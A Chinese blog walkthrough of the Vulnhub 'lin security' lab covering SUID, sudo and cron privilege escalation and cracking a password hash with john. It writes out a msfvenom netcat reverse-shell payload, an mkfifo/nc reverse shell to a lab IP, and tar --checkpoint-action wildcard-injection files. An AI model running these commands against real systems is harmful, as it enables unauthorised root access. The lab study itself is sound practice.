Vulnhub靶机 lin security(渗透测试详解)

一、拿到靶机需要更改网卡配置

1.开启靶机并进入编辑模式,将ro改为 rw signie init=/bin/bash,F10进入

2.修改网卡配置,改为ens33

vim /etc/netplan/50-cloud-init.yaml

netplan apply //配置应用生效

3.重启

4.登录bob用户,得到IP地址

二、得到IP地址后,利用kali扫描其服务端口信息

三、发现其开启了22端口,利用远程连接尝试连接

四、进行SUID提权

1.搜索SUID文件

find / -user root -perm -4000 -exec ls -ldb {} \;

挨个进行尝试

2.经过查询,发现taskset可以利用

3.成功获取root权限

五、SUDO提权

1、查看允许当前用户使用的命令

sudo -l

2.查询得到ash可以

3.查询到awk可以

4.查询到bash可以

5.查询csh可以

6.查询dash可以

7.查询ed也可以

8.查询env可以

9.查询到expect可以

10.查询到find存在

11.查询ftp可以

12.查询less可以

13.查询man可以

14.查询more可以

15.查询scp可以

16.查询socat可以

17.查询ssh可以

18.查询vi可以

19.查询zsh可以

20.查询perl可以

21.查询tclsh可以

22.查询git可以

23.查询script可以

24.查询scp可以

六、爆破用户密码

1、查看用户用户信息,发现有个密码是在外头的

cat /etc/passwd

2、尝试进行爆破

将这个用户密码写入到一个文件

利用john进行爆破

echo "insecurity:AzER3pBZh6WZE:0:0::/:/bin/sh" > q.txt

john --wordlist=/usr/share/wordlists/rockyou.txt q.txt

3、利用爆破出来的密码进行登录

七、计划任务提权

1.查看是否存在计划任务

cat /etc/crontab

2、利用msfvenom生成一个木马

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.234.129 lport=5555 R

3.写入到一个文件,并添加执行权限

echo "mkfifo /tmp/nhkdj; nc 192.168.234.129 5555 0</tmp/nhkdj | /bin/sh >/tmp/nhkdj 2>&1; rm /tmp/nhkdj" > shell.sh && chmod +x shell.s

echo > "--checkpoint-action=exec=sh shell.sh"

echo > "--checkpoint=1"

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值